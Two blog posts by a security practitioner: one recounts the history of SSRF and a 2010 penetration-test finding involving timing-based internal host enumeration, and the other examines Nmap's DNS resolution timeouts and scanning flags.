0

A brief history of SSRF

-

Server-Side Request Forgery is a security issue in applications where an attacker is able to get a server to send some type of a request (these days mostly HTTP/s requests) that the server should not be able to send. This issue is the classic abuse of trust vulnerability – the server tends to sit in a “trusted” environment (e.g., DMZ, your cloud VPC, etc.) and the users of the application sit outside the trust boundary (e.g., mobile devices, cafe, home, corporate environments, API clients within and outside cloud).

A brief history
In this blog post though, I won’t be talking about all the fancy new things that have had SSRF issues – you can likely find a few hundreds of those anyway! I am going to be talking about a brief history of this issue and what happened before we gave this issue a “name” – SSRF. The earliest references to the name “SSRF” appear to come from a talk done in BlackHat US 2012, and wayback machine tells me that the CWE-918 page was authored sometime around 2013. If you look closely at the CWE-918 page though, you will find that there were old CVEs dating back to 2002, and 2004. There was a Shmoocon talk about it in 2008 too but the term SSRF was not established until 2012.


The Issue

I was working on a penetration test for a financial services firm in 2010 of a popular load balancer that offered a GTM (Global traffic manager) solution and that allowed folks to login and obtain restricted execution environments wherefrom certain applications could be exposed and that would allow remote workers or untrusted entities who you only want to expose certain applications could use. The issue was in a POST request post login and IIRC even pre-login (though my details on this are fuzzy). This might be circa 2010 timeframe and to my knowledge the issue was not issued a CVE and wasn’t associated with Knowledge base article – I may not know 100%. The guidance from the vendor was simple – update the software and move on. The issue was this – an authenticated or an unauthenticated user would send an HTTP POST request to a page with a base64 encoded parameter that included a hostname which would trigger a DNS request on the back end of the GTM site. The time it took for the response to get back would indicate whether the domain was legitimate or not. So I used the a popular dictionary and enumerate all the hostnames from that directory that were legitimate and the ones that were not sitting outside on the Internet and mapping the hosts on the internal network.

The backstory
What the vendor of the GTM software did not know was how critical this application was to the business of the customer. They seemed to be dragging their feet without updates and meanwhile the customer – a financial institution with lots at stake could not go live. The pressure mounted on the IT staff to fix the issue and the vendor while being responsive was unable to give a firm date quickly – remember this was 13-14 years ago prior to bug bounties and responsible disclosures still were quite clunky! And the customer was also advising me to push the software vendor so we could discuss. Thankfully, on the vendor side, there was a solid security person who understood the issue immediately and its impact and advised the software teams to do what was right. They made the process post authentication and they also added tokens, limits and constant time responses to fix the issue.

Fast forward
Today, obviously things are a lot better. And I wrote this blog post so the old me can look back and point to this in a meaningful way without forgetting the old experiences among the new.

0

Nmap and DNS resolution Timeouts

-

I think Nmap is by far the best portscanner around if you want to do some serious port-scanning. Nmap performs a DNS resolution by default. This is good for obtaining the fully qualified domain names (FQDN), however, in some cases when you are scanning huge networks spanning several class Bs, it can have a significant effect on the duration of the scan.
Although using the -n parameter can completely stop nmap from performing any resolutions, but sometimes there’s that fine granularity that you need, i.e., you want to perform name resolutions but not if it exceeds a certain amount of time. I have to say that I wouldn’t have even craved for such an idiosyncratic feature, had it not been for nmap. Fyodor has been awesome enough to provide fine-grained control over port-scanning to your heart’s content.
So I opened up the nmap code, trying to figure out if I could fine tune that feature myself and I was not at all surprised that there were several comments in the code that would give you the impression that the authors of nmap have been considering this feature.
At this time it seems that the timeouts for the DNS servers are being read out of an arrayname:
static int read_timeouts[][] in nmap_dns.cc.
The way the code works is, this array has retransmission timeouts. Each row of this array represents what retransmission timeouts that nmap will follow depending on the number of DNS servers provided.

In nmap 4.76, therefore, if you specify one DNS server (or only one entry exists in /etc/resolv.conf) nmap will wait 4000ms, then another 4000ms followed by 5000ms before giving up. But if you do specify two DNS servers, then for the first DNS server the timeouts are 2500ms followed by 4000ms and then the same is tried for the 2nd entry in the DNS servers. Therefore, it seems that nmap will wait 13 seconds at max before giving up on the DNS resolution of a host. Imagine scanning a class B and having to wait 13 seconds for each of the hosts to resolve. It would be a significant overhead.

Of course, one can find other things to do if the IP address space is not DHCP, e.g., starting a separate list scan (-sL) and a portscan (with -n) simultaneously so that the DNS resolution timeouts do not result in a major impact as far as the portscanning itself is concerned.
There could be pros and cons to this as well which I may have failed to consider. But at this time it seems that it might be the most judicious approach.